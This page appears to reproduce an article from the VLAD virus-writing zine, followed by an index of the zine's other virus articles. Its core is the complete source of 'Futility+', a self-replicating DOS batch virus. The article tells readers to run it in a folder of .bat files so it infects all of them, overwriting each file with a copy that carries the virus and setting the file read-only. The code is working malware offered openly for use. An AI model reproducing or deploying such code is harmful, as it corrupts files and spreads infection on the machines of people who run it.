Virus Labs & Distribution
VLAD AF - Futility



Futility+ by Quantum / VLAD
---------------------------

Below you will find a true batch virus that uses only one external exe.
It uses Attrib to set already infected batch files to read only so they
are not re-infected.  Run the following batch file in a directory with
lots of .bat's and it will infect every one of them.  It contains no
directory transversal methods.


@ctty nul
echo if [%%1]==[INFECT.BAT] goto fuckit > infect.bat
echo del something.tmp >> infect.bat
echo copy /b %%1 something.tmp >> infect.bat
echo del %%1 >> infect.bat
echo copy /b %0 + %0.bat + something.tmp %%1 >> infect.bat
echo del something.tmp >> infect.bat
echo attrib +r %%1 >> infect.bat
echo :fuckit >> infect.bat
for %%f in (*.bat) do call infect.bat %%f
del infect.bat
ctty con

- VLAD AF INDEX -

ARTICLE.1_1      

Introduction
ARTICLE.1_2       Aims and Policies
ARTICLE.1_3       Greets
ARTICLE.1_4       Members/Joining
ARTICLE.1_5       Dist/Contact Info
ARTICLE.1_6       Hidden Area Info
ARTICLE.1_7       Coding the Mag

ARTICLE.2_1      

Butterfly Disasm
ARTICLE.2_2       Grandma Disasm
ARTICLE.2_3       Winword.Nemesis
ARTICLE.2_4       Stupid Poly guide
ARTICLE.2_5       Immortal Riot
ARTICLE.2_6       40hex
ARTICLE.2_7       Poet virus

ARTICLE.3_1      

VLAD Viruses
ARTICLE.3_2       Systa
ARTICLE.3_3       Improbability
ARTICLE.3_4       Vampire-1
ARTICLE.3_5       Prepender
ARTICLE.3_6       Futility+
ARTICLE.3_7       K-Rad

ARTICLE.4_1      

ARJDrop
ARTICLE.4_2       Televirus
ARTICLE.4_3       Batchbug
ARTICLE.4_4       242
ARTICLE.4_5       ASMVirus
ARTICLE.4_6       NFV
ARTICLE.4_7       April-1

About VLAD - Links - Contact Us - Main